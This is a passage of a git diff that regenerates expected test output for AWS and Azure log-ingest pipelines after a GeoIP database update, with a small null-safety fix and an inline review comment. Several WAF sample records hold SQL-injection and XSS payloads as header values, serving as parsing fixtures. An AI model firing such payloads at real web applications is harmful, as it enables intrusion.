@@ -628,7 +620,7 @@ }, "event": { "duration": 103000000, - "ingested": "2021-12-09T16:11:59.134221Z", + "ingested": "2021-12-14T14:35:30.078207621Z", "original": "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz \"PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1\" 200 - - 773 103 13 \"-\" \"-\" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -", "kind": "event", "action": "REST.PUT.OBJECT",
@@ -659,7 +651,15 @@ "key": "AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz", "object_size": 773 } - } + }, + "url": { + "path": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz", + "extension": "gz", + "original": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz" + }, + "tags": [ + "preserve_original_event" + ] } ] }
\ No newline at end of file
diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
index 77a00b72a08..31c17d40da9 100644
--- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
+++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
@@ -1,21 +1,31 @@ { "expected": [ { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + } + }, + "@timestamp": "2016-10-31T11:37:00.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22,
@@ -24,54 +34,21 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 34892, "bytes": 8855, - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "packets": 54 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", - "transport": "tcp", - "type": "ipv6", - "bytes": 8855, - "iana_number": "6", - "packets": 54 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - } - }, - "@timestamp": "2016-10-31T11:37:00.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] + "packets": 54, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T16:12:00.503382700Z", + "ingested": "2021-12-14T14:35:31.371624408Z", "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "kind": "event", "start": "2016-10-31T11:35:08.000Z",
@@ -88,6 +65,17 @@ "interface_id": "eni-1235b8ca123456789", "version": "2" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", + "transport": "tcp", + "type": "ipv6", + "bytes": 8855, + "iana_number": "6", + "packets": 54 } }, {
@@ -102,7 +90,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:00.503391600Z", + "ingested": "2021-12-14T14:35:31.371626576Z", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z",
@@ -134,7 +122,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:00.503397800Z", + "ingested": "2021-12-14T14:35:31.371627024Z", "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z",
@@ -155,17 +143,33 @@ ] }, { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + } + }, + "@timestamp": "2014-12-14T04:07:50.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -181,14 +185,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -203,6 +207,25 @@ "ip": "89.160.20.156", "packets": 20 }, + "event": { + "ingested": "2021-12-14T14:35:31.371627385Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", + "kind": "event", + "start": "2014-12-14T04:06:50.000Z", + "end": "2014-12-14T04:07:50.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "allow" + }, + "aws": { + "vpcflow": { + "action": "ACCEPT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ],
@@ -213,7 +236,9 @@ "bytes": 4249, "iana_number": "6", "packets": 20 - }, + } + }, + { "cloud": { "provider": "aws", "account": {
@@ -230,38 +255,17 @@ "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503403700Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", - "kind": "event", - "start": "2014-12-14T04:06:50.000Z", - "end": "2014-12-14T04:07:50.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "allow" - }, - "aws": { - "vpcflow": { - "action": "ACCEPT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -277,14 +281,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -299,6 +303,25 @@ "ip": "89.160.20.156", "packets": 20 }, + "event": { + "ingested": "2021-12-14T14:35:31.371627745Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", + "kind": "event", + "start": "2014-12-14T04:06:50.000Z", + "end": "2014-12-14T04:07:50.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "deny" + }, + "aws": { + "vpcflow": { + "action": "REJECT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ],
@@ -309,44 +332,25 @@ "bytes": 4249, "iana_number": "6", "packets": 20 - }, + } + }, + { "cloud": { "provider": "aws", "account": { "id": "123456789010" } }, - "@timestamp": "2014-12-14T04:07:50.000Z", + "@timestamp": "2015-05-29T16:32:22.000Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ "89.160.20.156", - "89.160.20.156" + "172.31.16.139" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503409900Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", - "kind": "event", - "start": "2014-12-14T04:06:50.000Z", - "end": "2014-12-14T04:07:50.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "deny" - }, - "aws": { - "vpcflow": { - "action": "REJECT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "port": 0, "address": "172.31.16.139",
@@ -355,14 +359,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -377,6 +381,25 @@ "ip": "89.160.20.156", "packets": 4 }, + "event": { + "ingested": "2021-12-14T14:35:31.371628115Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", + "kind": "event", + "start": "2015-05-29T16:30:27.000Z", + "end": "2015-05-29T16:32:22.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "allow" + }, + "aws": { + "vpcflow": { + "action": "ACCEPT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ],
@@ -386,7 +409,9 @@ "bytes": 336, "iana_number": "1", "packets": 4 - }, + } + }, + { "cloud": { "provider": "aws", "account": {
@@ -399,42 +424,21 @@ }, "related": { "ip": [ - "89.160.20.156", - "172.31.16.139" + "172.31.16.139", + "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503416200Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", - "kind": "event", - "start": "2015-05-29T16:30:27.000Z", - "end": "2015-05-29T16:32:22.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "allow" - }, - "aws": { - "vpcflow": { - "action": "ACCEPT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -454,34 +458,8 @@ "packets": 4, "ip": "172.31.16.139" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", - "type": "ipv4", - "bytes": 336, - "iana_number": "1", - "packets": 4 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - } - }, - "@timestamp": "2015-05-29T16:32:22.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "172.31.16.139", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T16:12:00.503420100Z", + "ingested": "2021-12-14T14:35:31.371628494Z", "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "kind": "event", "start": "2015-05-29T16:31:34.000Z",
@@ -498,6 +476,16 @@ "interface_id": "eni-1235b8ca123456789", "version": "2" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", + "type": "ipv4", + "bytes": 336, + "iana_number": "1", + "packets": 4 } } ]
diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
index cca3b2323c2..6be7b934be8 100644
--- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
+++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json
@@ -1,6 +1,25 @@ { "expected": [ { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + }, + "instance": { + "id": "i-01234567890123456" + } + }, + "@timestamp": "2019-08-26T19:48:53.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156", + "10.0.0.62" + ] + }, "destination": { "port": 5001, "address": "10.0.0.62",
@@ -9,14 +28,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -31,38 +50,8 @@ "ip": "89.160.20.156", "packets": 8 }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", - "transport": "tcp", - "type": "ipv4", - "bytes": 568, - "iana_number": "6", - "packets": 8 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - }, - "instance": { - "id": "i-01234567890123456" - } - }, - "@timestamp": "2019-08-26T19:48:53.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156", - "10.0.0.62" - ] - }, "event": { - "ingested": "2021-12-09T16:12:01.346119700Z", + "ingested": "2021-12-14T14:35:32.115689868Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "kind": "event", "start": "2019-08-26T19:47:55.000Z",
@@ -89,6 +78,17 @@ "action": "ACCEPT", "pkt_dstaddr": "10.0.0.62" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:dF5WY79X1yVncj+yH8q27Q5Bnpk=", + "transport": "tcp", + "type": "ipv4", + "bytes": 568, + "iana_number": "6", + "packets": 8 } }, {
@@ -106,7 +106,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:01.346125500Z", + "ingested": "2021-12-14T14:35:32.115692841Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z",
@@ -144,7 +144,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:01.346129200Z", + "ingested": "2021-12-14T14:35:32.115693276Z", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "kind": "event", "start": "2019-08-26T19:47:55.000Z",
diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
index b2240aa9ada..ec3d4eefb87 100644
--- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
+++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
@@ -8,14 +8,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -63,7 +63,7 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711621Z", + "ingested": "2021-12-14T14:35:32.433994951Z", "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:EXAMPLE12345:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"x-stm-test\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [
@@ -106,14 +106,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -161,7 +161,7 @@ }, "event": { "action": "ALLOW", - "ingested": "2021-12-09T16:12:01.711626900Z", + "ingested": "2021-12-14T14:35:32.433997291Z", "original": "{\"timestamp\":1592357192516,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"Default_Action\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"ALLOW\",\"terminatingRuleMatchDetails\":[],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[{\"ruleId\":\"TestRule\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"foo\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [
@@ -210,14 +210,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -265,7 +265,7 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711632900Z", + "ingested": "2021-12-14T14:35:32.433997675Z", "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ 
@@ -327,38 +327,6 @@ } }, { - "rule": { - "ruleset": "REGULAR", - "id": "STMTest_SQLi_XSS" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Stockholm", - "location": { - "lon": 17.8167, - "lat": 59.2 - } - }, - "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } - }, - "ip": "89.160.20.156" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "http", - "transport": "tcp" - }, "cloud": { "region": "ap-southeast-2", "provider": "aws", @@ -377,6 +345,10 @@ "89.160.20.156" ] }, + "rule": { + "ruleset": "REGULAR", + "id": "STMTest_SQLi_XSS" + }, "http": { "request": { "method": "POST", 
@@ -384,9 +356,30 @@ }, "version": "1.1" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "ip": "89.160.20.156" + }, "event": { "action": "BLOCK", - "ingested": "2021-12-09T16:12:01.711639Z", + "ingested": "2021-12-14T14:35:32.433998095Z", "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ @@ -415,6 +408,13 @@ }, "arn": "arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "http", + "transport": "tcp" } } ] diff --git a/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index 79bcd949ca5..ca4b82ad260 100644 --- a/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/waf/elasticsearch/ingest_pipeline/default.yml 
@@ -38,7 +38,7 @@ processors: field: json.httpRequest.country target_field: source.geo.country_iso_code ignore_missing: true - if: ctx.source?.geo.country_iso_code == null + if: ctx.source?.geo?.country_iso_code == null - geoip: database_file: GeoLite2-ASN.mmdb field: source.ip diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 9f0ddd23134..5e1fc0591f4 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: aws title: AWS -version: 1.7.0 +version: 1.7.1 license: basic description: Collect logs and metrics from Amazon Web Services with Elastic Agent. type: integration diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index 78e15e8ce5f..356150b69d7 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.12.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json index 3807df486fa..e54a74f31cc 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json 
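Review bot: The null-safe fix on `if: ctx.source?.geo?.country_iso_code == null` is not exercised by any fixture visible in this change — every regenerated WAF expected document still carries a populated `source.geo`, so a later regression back to `?.geo.` would still pass the pipeline tests. A sample event whose `httpRequest.clientIp` is an address the GeoIP database does not resolve (a private range, for instance) would make the condition run with `source` present but `source.geo` absent, which is presumably the case this fix is for, and would pin it. A short comment above the condition would also stop the next editor from dropping the second `?.`: `# source.geo is absent when geoip cannot resolve source.ip; both accessors must be null-safe or the script throws and the document fails.` The processor that owns this `if:` starts before the hunk, so the `set` it guards is not visible here.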
@@ -13,7 +13,7 @@ }, "event": { "action": "Microsoft.Resourcehealth/healthevent/Updated/action", - "ingested": "2021-12-09T13:30:56.909152600Z", + "ingested": "2021-12-14T14:35:43.079282922Z", "original": "{\"category\":\"ResourceHealth\",\"correlationId\":\"1c867fe2-050c-4a74-bb1c-a83b15246fdd\",\"level\":\"Information\",\"operationName\":\"Microsoft.Resourcehealth/healthevent/Updated/action\",\"properties\":{\"eventCategory\":\"ResourceHealth\",\"eventProperties\":{\"cause\":\"PlatformInitiated\"}},\"resourceId\":\"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.domainRegistration\",\"resultType\":\"Updated\",\"time\":\"2021-05-25T22:04:07.22Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json index 14d6f56a662..7b0575e2f5f 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": 